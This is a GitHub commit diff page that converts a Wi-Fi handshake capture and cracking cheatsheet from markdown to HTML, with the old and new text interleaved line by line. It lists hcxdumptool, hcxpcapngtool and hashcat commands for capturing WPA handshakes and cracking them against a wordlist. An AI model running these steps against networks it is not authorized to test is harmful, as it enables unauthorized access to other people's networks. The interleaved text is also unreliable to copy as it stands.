Update Wi-Fi_handshake_capture_cheatsheet.md

main
$./Netrunner_& 11 months ago committed by GitHub
parent 83a943d550
commit f8ebc469b9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -1,192 +1,119 @@
<!DOCTYPE html>
```markdown <html>
# Wi-Fi Handshake Capture & Crack Cheatsheet <head>
<title>Wi-Fi Handshake Capture & Crack Cheatsheet</title>
## Table of Contents <style>
body {
- [Preliminary Commands & Information Retrieval](#preliminary-commands--information-retrieval) font-family: Arial, sans-serif;
- [Capture & Conversion Phase](#capture--conversion-phase) }
- [Additional Scans & Information](#additional-scans--information) code {
- [Cracking Phase](#cracking-phase) background-color: #f4f4f4;
- [5GHz Network Capturing Cheat Sheet](#5ghz-network-capturing-cheat-sheet) padding: 5px;
}
## Preliminary Commands & Information Retrieval </style>
</head>
### Secure Copy from Remote Device <body>
```bash <h1>Wi-Fi Handshake Capture & Crack Cheatsheet 📡</h1>
scp -r root@172.16.42.1:/root/example.pcapng /home/username/Desktop
``` <h2>Table of Contents 📋</h2>
<ul>
📖 Downloads files from remote devices using SCP. <li><a href="#preliminary">Preliminary Commands & Information Retrieval</a></li>
<li><a href="#capture">Capture & Conversion Phase</a></li>
### Check Wireless Interfaces <li><a href="#additional">Additional Scans & Information</a></li>
<li><a href="#cracking">Cracking Phase</a></li>
```bash <li><a href="#5ghz">5GHz Network Capturing Cheat Sheet</a></li>
iwconfig </ul>
```
<h2 id="preliminary">Preliminary Commands & Information Retrieval 🛠</h2>
📖 Displays wireless network interface details. <ul>
<li><strong>Secure Copy from Remote Device</strong></li>
### Kill Interfering Services <code>scp -r root@172.16.42.1:/root/example.pcapng /home/username/Desktop</code>
<p>📖 Downloads files from remote devices using SCP.</p>
```bash <!-- ... -->
airmon-ng check kill <li><strong>Check Wireless Interfaces</strong></li>
``` <code>iwconfig</code>
<p>📖 Displays wireless network interface details.</p>
📖 Stops services that might interfere with wireless tools. <!-- ... -->
<li><strong>Kill Interfering Services</strong></li>
--- <code>airmon-ng check kill</code>
<p>📖 Stops services that might interfere with wireless tools.</p>
## Capture & Conversion Phase </ul>
### Set Wireless Card to Monitor Mode <h2 id="capture">Capture & Conversion Phase 🎯</h2>
<ul>
```bash <li><strong>Set Wireless Card to Monitor Mode</strong></li>
sudo ip link set wlan0 down <code>sudo ip link set wlan0 down</code>
sudo iw wlan0 set monitor control <code>sudo iw wlan0 set monitor control</code>
sudo ip link set wlan0 up <code>sudo ip link set wlan0 up</code>
<!-- ... -->
# Set back to normal <p>📖 Prepares the wireless card for capture.</p>
ip link set wlan0mon down <!-- ... -->
iwconfig wlan0mon mode managed <!-- ... -->
ip link set wlan0 up <li><strong>Capture Handshakes with hcxdumptool</strong></li>
``` <code>hcxdumptool -i wlan1 -o dumpfile.pcapng --active_beacon --enable_status=15</code>
<!-- ... -->
📖 Prepares the wireless card for capture. <p>📖 Captures packets from networks.</p>
<!-- ... -->
### Capture Handshakes with hcxdumptool <li><strong>Convert Captured File for Hashcat</strong></li>
<code>hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng</code>
```bash <p>📖 Converts packets for password cracking.</p>
hcxdumptool -i wlan1 -o dumpfile.pcapng --active_beacon --enable_status=15 //OLD </ul>
hcxdumptool -i wlan1 -w dumpfile.pcapng --disable_deauthentication --disable_beacon //NEW
hcxdumptool -i wlan1 -w dumpfile.pcapng --disable_deauthentication --rds=1//NEW <h2 id="additional">Additional Scans & Information 📡</h2>
``` <ul>
<li><strong>Scan for Nearby Networks</strong></li>
📖 Captures packets from networks. <code>hcxdumptool --do_rcascan -i wlan1</code>
<p>📖 Scans and displays nearby networks.</p>
### Convert Captured File for Hashcat </ul>
```bash <h2 id="cracking">Cracking Phase 🔐</h2>
hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng <ul>
``` <li><strong>Crack with Hashcat</strong></li>
<code>hashcat -m 22000 hash.hc22000 wordlist.txt</code>
📖 Converts packets for password cracking. <p>📖 Uses hashcat to attempt password cracks.</p>
</ul>
---
<h2 id="5ghz">5GHz Network Capturing Cheat Sheet 📶</h2>
## Additional Scans & Information <ul>
<li><strong>1. Install Necessary Tools</strong></li>
### Scan for Nearby Networks <code>sudo apt-get install hcxdumptool hcxtools</code>
```bash <li><strong>2. Check for 5GHz Support</strong></li>
hcxdumptool --do_rcascan -i wlan1 <code>iw list</code>
```
<li><strong>3. Enable Monitor Mode</strong></li>
📖 Scans and displays nearby networks. <code>sudo ip link set wlan0 down</code>
<code>sudo iw dev wlan0 set type monitor</code>
--- <code>sudo ip link set wlan0 up</code>
## Cracking Phase <li><strong>4. Set to 5GHz Channel</strong></li>
<code>sudo iw dev wlan0 set channel 36</code>
### Crack with Hashcat
<li><strong>5. Identify Target Networks</strong></li>
```bash <code>sudo hcxdumptool -i wlan0 --scan</code>
hashcat -m 22000 hash.hc22000 wordlist.txt
``` <li><strong>6. Capture Traffic</strong></li>
<code>sudo hcxdumptool -i wlan0 --enable_status=1 -o output.pcapng --filterlist=filterlist.txt --filtermode=2</code>
📖 Uses hashcat to attempt password cracks.
<li><strong>7. Analyze Captured Traffic</strong></li>
--- <code>hcxpcaptool -z output.hccapx output.pcapng</code>
💡 `sudo systemctl stop NetworkManager.service` <li><strong>8. Troubleshooting</strong></li>
💡 `sudo systemctl stop wpa_supplicant.service` <code>sudo iw reg get</code>
<code>sudo iw reg set US</code>
---
<li><strong>9. Switch Back to 2.4GHz</strong></li>
# 5GHz Network Capturing Cheat Sheet <code>sudo ip link set wlan0 down</code>
<code>sudo iw dev wlan0 set type monitor</code>
## 1. Install Necessary Tools <code>sudo iw dev wlan0 set channel 6</code>
<code>sudo ip link set wlan0 up</code>
```bash
sudo apt-get install hcxdumptool hcxtools <li><strong>10. List 2.4GHz Channels</strong></li>
``` <code>iw phy phy0 channels</code>
<code>iwlist wlan0 channel</code>
## 2. Check for 5GHz Support </ul>
</ul>
```bash
iw list </body>
``` </html>
## 3. Enable Monitor Mode
```bash
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
```
## 4. Set to 5GHz Channel
```bash
sudo iw dev wlan0 set channel 36
```
## 5. Identify Target Networks
```bash
sudo hcxdumptool -i wlan0 --scan
```
## 6. Capture Traffic
```bash
sudo hcxdumptool -i wlan0 --enable_status=1 -o output.pcapng --filterlist=filterlist.txt --filtermode=2
```
## 7. Analyze Captured Traffic
```bash
hcxpcaptool -z output.hccapx output.pcapng
```
## 8. Troubleshooting
- Check regulatory domain:
```bash
sudo iw reg get
sudo iw reg set US
```
- Check for nearby networks:
```bash
sudo iw dev wlan0 scan | grep -E '^(BSS|channel)'
```
- Check adapter capabilities:
```bash
iw list
```
## 9. Switch Back to 2.4GHz
```bash
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo iw dev wlan0 set channel 6
sudo ip link set wlan0 up
```
## 10. List 2.4GHz Channels
```bash
iw phy phy0 channels
# or
iwlist wlan0 channel
```
```
Feel free to modify or add any additional information!

Loading…
Cancel
Save